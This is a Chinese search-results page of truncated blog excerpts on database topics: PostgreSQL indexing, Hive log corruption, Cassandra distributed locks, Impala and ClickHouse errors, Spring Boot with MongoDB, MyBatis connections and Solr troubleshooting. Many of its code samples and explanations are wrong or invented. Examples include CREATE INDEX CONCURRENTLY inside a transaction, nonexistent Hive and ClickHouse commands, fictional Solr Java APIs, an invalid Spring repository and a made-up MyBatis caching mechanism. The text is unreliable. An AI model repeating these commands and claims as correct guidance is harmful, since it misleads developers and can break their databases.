[数据库操作安全性与SQL语句正确性]的搜索结果

PostgreSQL：如何创建一个可以“显示”值出来的索引？——索引背后的奥秘与实战应用 1. 引言 索引的"可视化"概念理解 在数据库的世界里，当我们谈论创建一个“可以显示值”的索引时，实际上是一种形象化的表达方式。我们可不是说索引它自己会变魔术般直接把数据展示给你看，而是想表达，索引这个小帮手能像寻宝图一样，在你查找数据时迅速找到正确路径，大大加快查询速度，让你省时又省力。就像一本老式的电话本，虽然它不会直接把每个朋友的所有信息都明晃晃地“晒”出来，但只要你报上姓名，就能麻溜地翻到那一页，找到你要的电话号码。本文将深入浅出地探讨PostgreSQL中如何创建和利用各种类型的索引，以加速查询性能。 2. 创建索引的基本过程 （1）单字段索引创建 假设我们有一个名为employees的表，其中包含一列employee_id，为了加快对员工ID的查询速度，我们可以创建一个B树索引： sql CREATE INDEX idx_employee_id ON employees (employee_id); 这个命令实质上是在employees表的employee_id列上构建了一个内部的数据结构，使得系统能够根据给定的employee_id快速检索相关行。 （2）多字段复合索引 如果我们经常需要按照first_name和surname进行联合查询，可以创建一个复合索引： sql CREATE INDEX idx_employee_names ON employees (first_name, surname); 这样的索引在搜索姓氏和名字组合时尤为高效。 3. 表达式索引的妙用 有时候，我们可能基于某个计算结果进行查询，例如，我们希望根据员工年龄(age)筛选出所有大于30岁的员工，尽管数据库中存储的是出生日期(birth_date)，但可以通过创建表达式索引来实现： sql CREATE INDEX idx_employee_age ON employees ((CURRENT_DATE - birth_date)); 在这个示例中，索引并非直接针对birth_date，而是基于当前日期减去出生日期得出的虚拟年龄字段。 4. 理解索引类型及其应用场景 - B树索引（默认）：适合范围查询和平行排序，如上所述的employee_id或age查询。 - 哈希索引：对于等值查询且数据分布均匀的情况效果显著，但不适合范围查询和排序。 - GiST、SP-GiST、GIN索引：这些索引适用于特殊的数据类型（如地理空间数据、全文搜索等），提供了不同于传统B树索引的功能和优势。 5. 并发创建索引 保持服务在线 在生产环境中，我们可能不愿因创建索引而阻塞其他查询操作。幸运的是，PostgreSQL支持并发创建索引，这意味着在索引构建过程中，表上的读写操作仍可继续进行： sql BEGIN; CREATE INDEX CONCURRENTLY idx_employee_ids ON employees (employee_id); COMMIT; 6. 思考与探讨 在实际使用中，索引虽好，但并非越多越好，也需权衡其带来的存储成本以及对写操作的影响。每次添加或删除记录时，相应的索引也需要更新，这可能导致写操作变慢。所以，在制定索引策略的时候，咱们得接地气儿点，充分考虑实际业务场景、查询习惯和数据分布的特性，然后做出个聪明的选择。 总结来说，PostgreSQL中的索引更像是幕后英雄，它们并不直接“显示”数据，却通过精巧的数据结构布局，让我们的查询请求如同拥有超能力一般疾速响应。设计每一个索引，其实就像是在开启一段优化的冒险旅程。这不仅是一次实实在在的技术操作实战，更是我们对浩瀚数据世界深度解读和灵动运用的一次艺术创作展示。

...的一个重要组件，是大数据处理的重要工具之一。你知道的，就像那些超级复杂的机器，Hive有时候也会有点小状况，比方说，日志文件突然就出点岔子了，对吧？这不仅会影响数据的正常处理，还可能对我们的生产环境造成困扰。嘿，朋友们，今天咱们就来聊聊一个超级实用的话题：Hive的日志文件为啥会突然“罢工”，还有怎么找出问题的症结并把它修好，就像医生检查身体一样精准！ 二、Hive日志文件的重要性 Hive的日志文件记录了查询执行的过程，包括但不限于SQL语句、执行计划、错误信息等。这些信息在调试问题、优化性能时至关重要。例如，当我们遇到查询运行缓慢或者失败时，日志文件就是我们寻找答案的第一线线索： sql EXPLAIN EXTENDED SELECT FROM table; 查看这个命令的执行计划，可以帮助我们理解为何查询效率低下。 三、日志文件损坏的原因 1. 磁盘故障 硬件故障是最直接的原因，如硬盘损坏或RAID阵列失效。 2. 运行异常 Hive在执行过程中如果遇到内存溢出、网络中断等情况，可能导致日志文件不完整。 3. 系统崩溃 操作系统崩溃或Hive服务突然停止也可能导致日志文件未被妥善关闭。 4. 管理操作失误 误删、覆盖日志文件也是常见的情况。 四、诊断Hive日志文件损坏 1. 使用Hive CLI检查 bash hive> show metastore_db_location; 查看Metastore的数据库位置，通常位于HDFS上，检查是否存在异常或损坏的文件。 2. 检查HDFS状态 bash hdfs dfs -ls /path/to/hive/logs 如果发现文件缺失或状态异常，可能是HDFS的问题。 3. 日志审查 打开Hive的错误日志文件，如hive.log，查看是否有明显的错误信息。 五、修复策略 1. 重新创建日志文件 如果只是临时的文件损坏，可以通过重启Hive服务或重启Metastore服务来生成新的日志。 2. 数据恢复 如果是磁盘故障导致的文件丢失，可能需要借助专业的数据恢复工具，但成功的概率较低。 3. 修复HDFS 如果是HDFS的问题，可以尝试修复文件系统，或者备份并替换损坏的文件。 4. 定期备份 为了避免类似问题，定期备份Hive的日志文件和Metastore数据是必要的。 六、预防措施 - 增强硬件监控，及时发现并处理潜在的硬件问题。 - 设置合理的资源限制，避免因内存溢出导致的日志丢失。 - 建立定期备份机制，出现问题时能快速恢复。 总结 Hive日志文件损坏可能会带来不少麻烦，但只要我们理解其重要性，掌握正确的诊断和修复方法，就能在遇到问题时迅速找到解决方案。你知道吗，老话说得好，“防患于未然”，要想让Hive这个大家伙稳稳当当的，关键就在于咱们得养成勤快的保养习惯，定期检查和打理。希望这篇小文能像老朋友一样，给你点拨一二，轻松搞定Hive日志文件出问题的烦心事。

在数据库管理和运维过程中，表锁定问题是影响数据操作效率和系统稳定性的重要因素之一。最近的一篇技术博客深入探讨了PostgreSQL中遇到的表无法删除的情况，其中涉及的表级ExclusiveLock问题尤为关键。实际上，不仅是在删除表时，当多个并发事务对同一资源进行访问，尤其是在更新或删除操作时，如果没有恰当的锁管理策略，就可能出现死锁现象，严重影响系统的正常运行。 近期，PostgreSQL官方社区持续关注并优化其锁管理机制，例如在最新版本中增强了对锁定情况的监控与诊断能力，通过扩展视图如pg_stat_activity和pg_locks能够更清晰地追踪到引起阻塞的具体SQL语句和后台进程，便于及时发现和解决问题。 此外，有数据库专家建议，在设计高并发场景下的应用时，应遵循最小化锁定的原则，合理使用行级锁定、乐观锁定等高级特性以减少锁冲突。同时，结合定期清理长时间未结束的事务以及对异常会话采取适当终止措施，可有效避免类似无法删除表的问题发生。 值得注意的是，虽然pg_terminate_backend()函数能强力解决锁冲突，但需谨慎使用，因为它可能导致其他正在进行的事务回滚，并可能引发用户会话中断等问题。因此，在实际操作中，优先推荐排查锁定原因并优化应用程序逻辑，确保数据库操作的高效与安全。通过持续学习与实践，提升对PostgreSQL锁机制的理解，有助于提高数据库性能和保证业务连续性。

MySQL , MySQL是一个开源的关系型数据库管理系统，由Oracle公司开发并维护。在本文中，用户遵循步骤在Windows系统上下载和安装了最新版的MySQL社区版，该版本为用户提供免费且功能强大的数据库服务，支持多种SQL语句操作，并具有高可用性、安全性和可扩展性等特点。 系统服务 , 在Windows操作系统环境中，系统服务是一种可以在后台运行的应用程序，无需用户交互即可提供特定功能或资源。文中提到的MySQL在安装后被注册为一个名为“MySQL80”的系统服务，这意味着MySQL服务器可以随系统的启动自动运行，并可以通过系统自带的服务管理工具进行启动、停止和状态查看等操作。 环境变量 , 环境变量是在操作系统中用来指定操作系统运行时搜索文件和其他系统资源路径的一种机制。在本文中，为了能够在任意目录下通过命令行连接MySQL，需要将MySQL的bin目录（例如C:Program FilesMySQLMySQL Server 8.0bin）添加到系统的PATH环境变量中。这样，操作系统就能识别并执行MySQL的相关命令，使得用户无需切换到MySQL的安装目录也能便捷地使用MySQL命令行客户端进行数据库连接与操作。

...的分布式系统时，保证数据的一致性和操作的原子性成为了一项至关重要的挑战。分布式锁，就是解决这个问题的神器之一。想象一下，在一个有很多节点的大环境里，它能确保同一时刻只有一个节点能够独享执行某个特定操作的权利，就像一个严格的交通警察，只允许一辆车通过路口一样。虽然Redis、ZooKeeper这些家伙在处理分布式锁这事上更常见一些，不过Apache Cassandra这位NoSQL数据库界的扛把子，扩展性超强、一致性牛哄哄的，它同样也能妥妥地支持分布式锁的功能，一点儿也不含糊。这篇文章会手把手带你玩转Cassandra，教你如何机智地用它来搭建分布式锁，并且通过实实在在的代码实例，一步步展示我们在实现过程中的脑洞大开和实战心得。 2. 利用Cassandra的数据模型设计分布式锁 首先，我们需要理解Cassandra的数据模型特点，它基于列族存储，具有天然的分布式特性。对于分布式锁的设计，我们可以创建一个专门的表来模拟锁的存在状态： cql CREATE TABLE distributed_lock ( lock_id text, owner text, timestamp timestamp, PRIMARY KEY (lock_id) ) WITH default_time_to_live = 60; 这里，lock_id表示要锁定的资源标识，owner记录当前持有锁的节点信息，timestamp用于判断锁的有效期。设置TTL（Time To Live）这玩意儿，其实就像是给一把锁定了个“保质期”，为的是防止出现死锁这么个尴尬情况。想象一下，某个节点正握着一把锁，结果突然嗝屁了还没来得及把锁解开，这时候要是没个机制在一定时间后自动让锁失效，那不就僵持住了嘛。所以呢，这个TTL就是来扮演救场角色的，到点就把锁给自动释放了。 3. 使用Cassandra实现分布式锁的基本逻辑 为了获取锁，一个节点需要执行以下步骤： 1. 尝试插入锁定记录 - 使用INSERT IF NOT EXISTS语句尝试向distributed_lock表中插入一条记录。 cql INSERT INTO distributed_lock (lock_id, owner, timestamp) VALUES ('resource_1', 'node_A', toTimestamp(now())) IF NOT EXISTS; 如果插入成功，则说明当前无其他节点持有该锁，因此本节点获得了锁。 2. 检查插入结果 - Cassandra的INSERT语句会返回一个布尔值，指示插入是否成功。只有当插入成功时，节点才认为自己成功获取了锁。 3. 锁维护与释放 - 节点在持有锁期间应定期更新timestamp以延长锁的有效期，避免因超时而被误删。 - 在完成临界区操作后，节点通过DELETE语句释放锁： cql DELETE FROM distributed_lock WHERE lock_id = 'resource_1'; 4. 实际应用中的挑战与优化 然而，在实际场景中，直接使用上述简单方法可能会遇到一些挑战： - 竞争条件：多个节点可能同时尝试获取锁，单纯依赖INSERT IF NOT EXISTS可能导致冲突。 - 网络延迟：在网络分区或高延迟情况下，一个节点可能无法及时感知到锁已被其他节点获取。 为了解决这些问题，我们可以在客户端实现更复杂的算法，如采用CAS（Compare and Set）策略，或者引入租约机制并结合心跳维持，确保在获得锁后能够稳定持有并最终正确释放。 5. 结论与探讨 虽然Cassandra并不像Redis那样提供了内置的分布式锁API，但它凭借其强大的分布式能力和灵活的数据模型，仍然可以通过精心设计的查询语句和客户端逻辑实现分布式锁功能。当然，在真实生产环境中，实施这样的方案之前，需要充分考虑性能、容错性以及系统的整体复杂度。每个团队会根据自家业务的具体需求和擅长的技术工具箱，挑选出最合适、最趁手的解决方案。就像有时候，面对复杂的协调难题，还不如找一个经验丰富的“老司机”帮忙，比如用那些久经沙场、深受好评的分布式协调服务，像是ZooKeeper或者Consul，它们往往能提供更加省时省力又高效的解决之道。不过，对于已经深度集成Cassandra的应用而言，直接在Cassandra内实现分布式锁也不失为一种有创意且贴合实际的策略。

...ion解决方案 在大数据领域，Impala是一种快速、交互式查询的数据仓库系统。它支持SQL查询，并且可以在Hadoop集群上运行。不过，在我们用Impala干活儿的时候，有时候会遇到一些小插曲。比如说，可能会蹦出来个“InvalidTableIdOrNameInDatabaseException”的错误提示，其实就是告诉你数据库里的表ID或者名字不太对劲儿。 这篇文章将详细介绍这种异常的原因以及如何解决它。我们将从问题的背景出发，逐步深入讨论，最后提供具体的解决方案。 1. 异常背景 InvalidTableIdOrNameInDatabaseException是Impala抛出的一种错误类型。它通常表示你试图访问一个不存在的表。这可能是由于多种原因引起的，包括但不限于： - 拼写错误 - 表名不正确 - 表已被删除或移动到其他位置 - 表不在当前工作目录中 2. 常见原因 2.1 拼写错误 这是最常见的原因之一。如果你在查询的时候，不小心把表名输错了，那Impala就找不着北了，它会给你抛出一个“InvalidTableIdOrNameInDatabaseException”异常。简单来说，就是它发现你指的这个表根本不存在，所以闹了个小脾气，用这个异常告诉你：喂，老兄，你提供的表名我找不到啊！ sql -- 错误的示例： SELECT FROM my_table; 在这个例子中，“my_table”就是拼写错误的表名。正确的应该是"My Table"。 2.2 表名不正确 有时候，我们可能会混淆数据库的表名。即使你记得你的表名是正确的，但是可能在某个地方被错误地改写了。 sql -- 错误的示例： SELECT FROM "my_table"; 在这个例子中，我们在表名前添加了一个多余的双引号。这样，Impala就会认为这是一个字符串，而不是一个表名。 2.3 表已被删除或移动到其他位置 如果一个表已经被删除或者被移动到了其他位置，那么你就不能再通过原来的方式来访问它。 sql -- 错误的示例： DROP TABLE my_table; 在这个例子中，我们删除了名为“my_table”的表。然后，假如我们还坚持用这个表名去查找它的话，数据库就会闹脾气，给我们抛出一个“InvalidTableIdOrNameInDatabaseException”异常，就像在说：“嘿，你找的这个表名我压根不认识，给咱整迷糊了！” 2.4 表不在当前工作目录中 如果你在一个特定的工作目录下创建了一个表，但是当你尝试在这个目录之外的地方访问这个表时，就会出现这个问题。 sql -- 错误的示例： CREATE DATABASE db; USE db; CREATE TABLE my_table AS SELECT FROM big_data; -- 然后尝试在这个目录外访问这个表： SELECT FROM db.my_table; 在这个例子中，我们首先在数据库db中创建了一个名为my_table的表。然后，我们在同一个数据库中执行了一个查询。当你试图在不同的数据库里查找这个表格的时候，系统就会给你抛出一个“无效表格ID或名称”的异常，这个异常叫做InvalidTableIdOrNameInDatabaseException。就跟你在图书馆找书，却报了个“书名或书架号不存在”的错误一样，让你一时摸不着头脑。 3. 解决方案 根据上面的分析，我们可以得到以下几个可能的解决方案： 3.1 检查表名拼写 确保你在查询语句中输入的表名是正确的。你可以检查一下你的表名是否一致，特别是大小写和空格方面。 3.2 校对表名 仔细检查你的表名，确保没有拼写错误。同时，也要注意是否有错误的位置或者标点符号。 3.3 恢复已删除的表 如果你发现一个表被意外地删除了，你可以尝试恢复它。这通常需要管理员的帮助。 3.4 重新加载数据 如果你的表已被移动到其他位置，你需要重新加载数据。这通常涉及到更改你的查询语句或者配置文件。 3.5 改变工作目录 如果你的表不在当前工作目录中，你需要改变你的工作目录。这可以通过use命令完成。 总的来说，解决InvalidTableIdOrNameInDatabaseException的关键在于找出问题的根本原因。一旦你知道了问题所在，就可以采取相应的措施来解决问题。

...作为一款高性能的列式数据库管理系统，以其卓越的实时数据分析能力广受青睐。不过在实际动手操作的时候，特别是当我们想要利用它的“外部表”功能和外界的数据源打交道的时候，确实会碰到一些让人头疼的小插曲。比如说，可能会遇到文件系统权限设置得不对劲儿，或者压根儿就找不到要找的文件这些让人抓狂的问题。本文将深入探讨这些问题，并通过实例代码解析如何解决这些问题。 2. ClickHouse外部表简介 在ClickHouse中，外部表是一种特殊的表类型，它并不直接存储数据，而是指向存储在文件系统或其他数据源中的数据。这种方式让数据的导入导出变得超级灵活，不过呢，也给我们带来了些新麻烦。具体来说，就是在权限控制和文件状态追踪这两个环节上，挑战可是不小。 3. 文件系统权限不正确的处理方法 3.1 问题描述 假设我们已创建一个指向本地文件系统的外部表，但在查询时收到错误提示：“Access to file denied”，这通常意味着ClickHouse服务账户没有足够的权限访问该文件。 sql CREATE TABLE external_table (event Date, id Int64) ENGINE = File(Parquet, '/path/to/your/file.parquet'); SELECT FROM external_table; -- Access to file denied 3.2 解决方案 首先，我们需要确认ClickHouse服务运行账户对目标文件或目录拥有读取权限。可以通过更改文件或目录的所有权或修改访问权限来实现： bash sudo chown -R clickhouse:clickhouse /path/to/your/file.parquet sudo chmod -R 750 /path/to/your/file.parquet 这里，“clickhouse”是ClickHouse服务默认使用的系统账户名，您需要将其替换为您的实际环境下的账户名。对了，你知道吗？这个“750”啊，就像是个门锁密码一样，代表着一种常见的权限分配方式。具体来说呢，就是文件的所有者，相当于家的主人，拥有全部权限——想读就读，想写就写，还能执行操作；同组的其他用户呢，就好比是家人或者室友，他们能读取文件内容，也能执行相关的操作，但就不能随意修改了；而那些不属于这个组的其他用户呢，就像是门外的访客，对于这个文件来说，那可是一点权限都没有，完全进不去。 4. 文件不存在的问题及其解决策略 4.1 问题描述 当我们在创建外部表时指定的文件路径无效或者文件已被删除时，尝试从该表查询数据会返回“File not found”的错误。 sql CREATE TABLE missing_file_table (data String) ENGINE = File(TSV, '/nonexistent/path/file.tsv'); SELECT FROM missing_file_table; -- File not found 4.2 解决方案 针对此类问题，我们的首要任务是确保指定的文件路径是存在的并且文件内容有效。若文件确实已被移除，那么重新生成或恢复文件是最直接的解决办法。另外，你还可以琢磨一下在ClickHouse的配置里头开启自动监控和重试功能，这样一来，万一碰到文件临时抽风、没法用的情况，它就能自己动手解决问题了。 另外，对于周期性更新的外部数据源，推荐结合ALTER TABLE ... UPDATE语句或MaterializeMySQL等引擎动态更新外部表的数据源路径。 sql -- 假设新文件已经生成，只需更新表结构即可 ALTER TABLE missing_file_table MODIFY SETTING path = '/new/existing/path/file.tsv'; 5. 结论与思考 在使用ClickHouse外部表的过程中，理解并妥善处理文件系统权限和文件状态问题是至关重要的。只有当数据能够被安全、稳定地访问，才能充分发挥ClickHouse在大数据分析领域的强大效能。这也正好敲响我们的小闹钟，在我们捣鼓数据架构和运维流程的设计时，千万不能忘了把权限控制和数据完整性这两块大骨头放进思考篮子里。这样一来，咱们才能稳稳当当地保障整个数据链路健健康康地运转起来。

...多的企业开始采用NoSQL数据库作为其数据存储的核心系统。其中，MongoDB凭借其灵活的数据模型、强大的查询能力和易于使用的API，成为了许多企业的首选。在众多的NoSQL数据库里头，SpringBoot和MongoDB的联手合作可是相当普遍，而且技术上也相当成熟，可以说是其中一对黄金搭档啦！这篇文稿，咱们要手把手地教你如何在SpringBoot这个大家伙里头接入MongoDB数据库，并且还会举些实实在在的例子，演示一些你可能会经常用到的操作步骤，保证接地气儿，不玩虚的。 2. 环境搭建 在开始集成之前，我们需要先准备好相应的开发环境。首先，兄弟姐妹们，咱得先下载并安装Java运行环境。版本上没硬性要求，不过我强烈建议你们选择最新潮的那个——Java 8或者更新更高的版本，这样用起来更溜~然后，我们需要下载并安装SpringBoot和Maven这两个工具。SpringBoot可以为我们提供一个快速构建Web应用的基础框架，而Maven则可以帮助我们管理项目的依赖关系。 3. 创建SpringBoot项目 接下来，我们可以开始创建我们的SpringBoot项目。首先，打开命令行工具，并进入你要存放项目的位置。然后，输入以下命令来创建一个新的SpringBoot项目： bash mvn archetype:generate -DgroupId=com.example -DartifactId=springboot-mongoapp -DarchetypeArtifactId= spring-boot-starter-parent -DinteractiveMode=false 这行命令的意思是使用Maven的archetype功能来生成一个新的SpringBoot项目，该项目的组ID为com.example， artifactID为springboot-mongoapp，父依赖为spring-boot-starter-parent。这个命令会自动为你创建好所有的项目文件和目录结构，包括pom.xml和src/main/java/com/example/springbootmongoapp等文件。 4. 配置SpringBoot和MongoDB 在创建好项目之后，我们需要进行一些配置工作。首先，我们需要在pom.xml文件中添加SpringDataMongoDB的依赖： xml org.springframework.boot spring-boot-starter-data-mongodb 这行代码的意思是我们需要使用SpringDataMongoDB来处理MongoDB的相关操作。然后，我们需要在application.properties文件中添加MongoDB的连接信息： properties spring.data.mongodb.uri=mongodb://localhost:27017/mydb 这行代码的意思是我们的MongoDB服务器位于本地主机的27017端口上，且数据库名为mydb。 5. 使用MongoTemplate操作MongoDB 在配置完成后，我们就可以开始使用MongoTemplate来操作MongoDB了。MongoTemplate是SpringDataMongoDB提供的一个类，它可以帮助我们执行各种数据库操作。下面是一些基本的操作示例： java @Autowired private MongoTemplate mongoTemplate; public void insert(String collectionName, String id, Object entity) { mongoTemplate.insert(entity, collectionName); } public List find(String collectionName, Query query) { return mongoTemplate.find(query, Object.class, collectionName); } 6. 使用Repository操作MongoDB 除了MongoTemplate之外，SpringDataMongoDB还提供了Repository接口，它可以帮助我们更加方便地进行数据库操作。我们完全可以把这个接口“继承”下来，然后自己动手编写几个核心的方法，就像是插入数据、查找信息、更新记录、删除项目这些基本操作，让它们各司其职，活跃在我们的程序里。下面是一个简单的示例： java @Repository public interface UserRepository extends MongoRepository { User findByUsername(String username); void deleteByUsername(String username); default void save(User user) { if (user.getId() == null) { user.setId(UUID.randomUUID().toString()); } super.save(user); } @Query(value = "{'username':?0}") List findByUsername(String username); } 7. 总结 总的来说，SpringBoot与MongoDB的集成是非常简单和便捷的。只需要几步简单的配置，我们就可以使用SpringBoot的强大功能来操作MongoDB。而且你知道吗，SpringDataMongoDB这家伙还藏着不少好东西嘞，像数据映射、查询、聚合这些高级功能，全都是它的拿手好戏。这样一来，我们开发应用程序就能又快又高效，简直像是插上了小翅膀一样飞速前进！所以，如果你正在琢磨着用NoSQL数据库来搭建你的数据存储方案，那我真心实意地拍胸脯推荐你试试SpringBoot配上MongoDB这个黄金组合，准保不会让你失望！

...开发中，我们都需要与数据库打交道。但是，数据库操作这活儿可不是闹着玩的，它可是个耗精力的大工程，管理起来得费不少心思，维护起来也相当劳神。这就是为什么 MyBatis 出现了。它为我们提供了一种简单的方式来操作数据库。在这篇文章中，我们将讨论 MyBatis 如何处理数据库连接的打开与关闭。 一、MyBatis 数据库连接的打开与关闭 当我们使用 JDBC 连接到数据库时，我们需要自己管理数据库连接的打开与关闭。这个过程其实挺复杂的，你得先建立起跟数据库的连接，然后才能用它来干活儿，最后还别忘了把它给关掉。就像是你要进一个房间，得先打开门进去，忙完事情后，还得记得把门关上。整个一套流程下来，真是够繁琐的。为了让大伙儿省去这些麻烦的操作，MyBatis 设计了一个叫做“SqlSessionFactory”的小帮手，它的任务就是打理所有和数据库连接相关的事务，确保一切井井有条。SqlSessionFactory 是 MyBatis 的核心组件，它是一个工厂类，用于创建 SqlSession 对象。SqlSession 是 MyBatis 的主要接口，它提供了所有数据库操作的方法。SqlSessionFactory 和 SqlSession 的关系如下图所示：  当我们在应用程序中创建一个 SqlSessionFactory 对象时，它会自动打开一个数据库连接，并将其保存在内存中。这样，每次我们想要创建一个 SqlSession 对象时，就像去 SqlSessionFactory 那儿说“嗨，给我开个数据库连接”，然后它就会从内存这个大口袋里掏出一个已经为我们预先打开的数据库连接。这种方式能够显著缩短创建和释放数据库连接所需的时间，让咱们的应用程序跑得更溜、更快。 二、MyBatis 如何处理数据库连接的打开与关闭 在 MyBatis 中，我们可以使用两种方式来处理数据库连接的打开与关闭。一种是手动管理，另一种是自动管理。 1. 手动管理 手动管理是指我们在应用程序中直接控制数据库连接的打开与关闭。这是最原始的方式，也是最直观的方式。我们可以通过 JDBC API 来实现数据库连接的打开与关闭。比如，我们可以想象一下这样操作：先用 DriverManager.getConnection() 这个神奇的小功能打开通往数据库的大门，然后呢，当我们不需要再跟数据库“交流”的时候，就用 Statement.close() 或 PreparedStatement.close() 这两个小工具把门关上，这样一来，我们就完成了数据库连接的开启和关闭啦。这种方式的好处就是超级灵活，就像你定制专属T恤一样，我们可以根据应用程序的独特需求，随心所欲地调整数据库连接的表现，让它更听话、更好使。缺点是工作量大，容易出错，而且无法充分利用数据库连接池的优势。 2. 自动管理 自动管理是指 MyBatis 在内部自动管理数据库连接的打开与关闭。这种方式的优点是可以避免手动管理数据库连接的繁琐工作，提高应用程序的性能。不过呢，这种方式有个小缺憾，就是不够灵活，咱们没法随心所欲地掌控数据库连接的具体表现。另外，想象一下这个场景哈，如果我们开发的小程序里，好几个线程兄弟同时挤进去访问数据库的话，就很可能碰上并发问题这个小麻烦。 三、MyBatis 的自动管理机制 为了实现自动管理，MyBatis 提供了一个名为“StatementExecutor”的类，它负责处理 SQL 查询请求。StatementExecutor 使用一个名为“PreparedStatementCache”的缓存来存储预编译的 SQL 查询语句。每当一个新的 SQL 查询请求到来时，StatementExecutor 就会在 PreparedStatementCache 中查找是否有一个匹配的预编译的 SQL 查询语句。如果有，就直接使用这个预编译的 SQL 查询语句来执行查询请求；如果没有，就先使用 JDBC API 来编译 SQL 查询语句，然后再执行查询请求。在这个过程中，StatementExecutor 将会自动打开和关闭数据库连接。当StatementExecutor辛辛苦苦执行完一个SQL查询请求后，它会像个聪明的小助手那样，主动判断一下是否有必要把这个SQL查询语句存放到PreparedStatementCache这个小仓库里。当SQL查询语句被执行的次数蹭蹭蹭地超过了某个限定值时，StatementExecutor这个小机灵鬼就会把SQL查询语句悄悄塞进PreparedStatementCache这个“备忘录”里头，这样一来，下次再遇到同样的查询需求，咱们就可以直接从“备忘录”里拿出来用，省时又省力。 四、总结 总的来说，MyBatis 是一个强大的持久层框架，它可以方便地管理数据库连接，提高应用程序的性能。然而，在使用 MyBatis 时，我们也需要注意一些问题。首先，我们应该合理使用数据库连接，避免长时间占用数据库连接。其次，我强烈建议大家伙尽可能多用 PreparedStatement 类型的 SQL 查询语句，为啥呢？因为它比 Statement 那种类型的 SQL 查询语句可安全多了。就像是给你的查询语句戴上了防护口罩，能有效防止SQL注入这类安全隐患，让数据处理更稳当、更保险。最后，我强烈推荐你们在处理预编译的 SQL 查询语句时，用上 PreparedStatementCache 这种缓存技术。为啥呢？因为它能超级有效地提升咱应用程序的运行速度和性能，让整个系统更加流畅、响应更快，就像给程序装上了涡轮增压器一样。

...，随你喜欢。 3. 数据库中间件 Node.js 可以作为数据库中间件，与数据库交互并实现数据的读取、存储和更新等功能。比如，我们可以拿起 Mongoose ORM 这个工具箱，它能帮我们牵线搭桥连上 MongoDB 数据库。然后，我们就能够借助它提供的查询语句，像玩魔术一样对数据进行各种操作，插入、删除、修改，随心所欲。 二、常用的云服务提供商及其 Node.js 开发教程 1. AWS AWS 提供了一系列的云服务，包括计算、存储、数据库、安全等等。在 AWS 上，我们可以使用 Lambda 函数来实现无服务器架构，使用 EC2 或 ECS 来部署 Node.js 应用程序。此外，AWS 还提供了丰富的 SDK 和 CLI 工具，方便我们在本地开发和调试应用程序。 2. Google Cloud Platform (GCP) GCP 提供了类似的云服务，包括 Compute Engine、App Engine、Cloud Functions、Cloud SQL 等等。在 GCP（Google Cloud Platform）这个平台上，咱们完全可以利用 Node.js 这门技术来开发应用程序，然后把它们稳稳地部署到 App Engine 上。这样一来，咱们就能更轻松、更方便地管理自家的应用程序，同时还能对它进行全方位的监控，确保一切运行得妥妥当当的。就像是在自家后院种菜一样，从播种（开发）到上架（部署），再到日常照料（管理和监控），全都在掌控之中。 3. Azure Azure 是微软提供的云服务平台，支持多种编程语言和技术栈。在 Azure 上，我们可以使用 Function App 来部署 Node.js 函数，并使用 App Service 来部署完整的 Node.js 应用程序。另外，Azure还准备了一整套超级实用的DevOps工具和服务，这对我们来说可真是个大宝贝，能够帮我们在管理和发布应用程序时更加得心应手，轻松高效。 接下来，我们将详细介绍如何使用 Node.js 在 AWS Lambda 上构建无服务器应用程序。 三、在 AWS Lambda 上使用 Node.js 构建无服务器应用程序 AWS Lambda 是一种无服务器计算服务，可以让开发者无需关心服务器的操作系统、虚拟机配置等问题，只需要专注于编写和上传代码即可。在Lambda这个平台上，咱们能够用Node.js来编写函数，就像变魔术一样把函数和触发器手牵手连起来，这样一来，就能轻松实现自动执行的酷炫效果啦！ 以下是使用 Node.js 在 AWS Lambda 上构建无服务器应用程序的基本步骤： Step 1: 创建 AWS 帐户并登录 AWS 控制台 Step 2: 安装 AWS CLI 工具 Step 3: 创建 Lambda 函数 Step 4: 编写 Lambda 函数 Step 5: 配置 Lambda 函数触发器 Step 6: 测试 Lambda 函数 Step 7: 将 Lambda 函数部署到生产环境

...爱。然而，在实际动手操作的时候，我们常常会碰到一些让人挠头的小状况，比如“solr配置出岔子了”，又或者是“集群配置搞错了”这类问题。这篇文章，咱们就从实实在在的例子开始，手把手地带大家一步步揭开这些问题背后的秘密，同时还会送上一些真正管用的解决办法！ 二、Solr配置错误分析及解决方法 1.1 全文索引导入失败 根据知识库中的资料，我们发现一位开发者在2021年5月28日遇到了“solr配置错误”的问题。具体表现为：Full Import failed:java.lang.RuntimeException:java.lang.RuntimeException:org.apache.solr.handler.dataimport.DataImportHandlerException:One of driver or jndiName must be specified。 对于这个问题，我们可以从以下几个方面进行排查： - 首先，检查solr的配置文件，确认数据源驱动类是否正确配置； - 其次，检查数据库连接参数是否正确设置； - 最后，查看日志文件，查看是否有其他异常信息。 在实践中，我们可以尝试如下代码实现： java // 创建DataImporter对象 DataImporter importer = new DataImporter(); // 设置数据库连接参数 importer.setDataSource(new JdbcDataSource()); importer.setSql("SELECT FROM table_name"); // 执行数据导入 importer.fullImport("/path/to/solr/home"); 如果以上步骤无法解决问题，建议查阅相关文档或寻求专业人士的帮助。 1.2 集群配置错误 另一位开发者在2020年7月25日反馈了一个关于Solr集群配置的错误问题。其问题描述为：“淘淘商城第60讲——搭建Solr集群时，报错：org.apache.solr.common.SolrException: Could not find collection : core1”。读了这位开发者的文章，我们发现他在搭建Solr集群的时候，实实在在地碰到了上面提到的那些问题。 对于这个问题，我们可以从以下几个方面进行排查： - 首先，检查solr的配置文件，确认核心集合是否正确配置； - 其次，检查集群状态，确认所有节点是否都已经正常启动； - 最后，查看日志文件，查看是否有其他异常信息。 在实践中，我们可以尝试如下代码实现： java // 启动集群 CoreContainer cc = CoreContainer.create(CoreContainer.DEFAULT_CONFIG); cc.load(new File("/path/to/solr/home/solr.xml")); cc.start(); // 查询集群状态 Collections cores = cc.getCores(); for (SolrCore core : cores) { System.out.println(core.getName() + " status : " + core.getStatus()); } 如果以上步骤无法解决问题，建议查阅相关文档或寻求专业人士的帮助。 三、Solr代码执行漏洞排查及解决方法 近年来，随着Apache Solr的广泛应用，安全问题日益突出。嘿，你知道吗？在2019年11月19日曝出的一条消息，Apache Solr这个家伙在默认设置下有个不小的安全隐患。如果它以cloud模式启动，并且对外开放的话，那么远程的黑客就有机会利用这个漏洞，在目标系统上随心所欲地执行任何代码呢！就像是拿到了系统的遥控器一样，想想都有点让人捏把汗呐！ 对于这个问题，我们可以从以下几个方面进行排查： - 首先，检查solr的安全配置，确保只允许受信任的IP地址访问； - 其次，关闭不必要的服务端功能，如远程管理、JMX等； - 最后，定期更新solr到最新版本，以获取最新的安全补丁。 在实践中，我们可以尝试如下代码实现： java // 关闭JMX服务 String configPath = "/path/to/solr/home/solr.xml"; File configFile = new File(configPath); DocumentBuilder db = 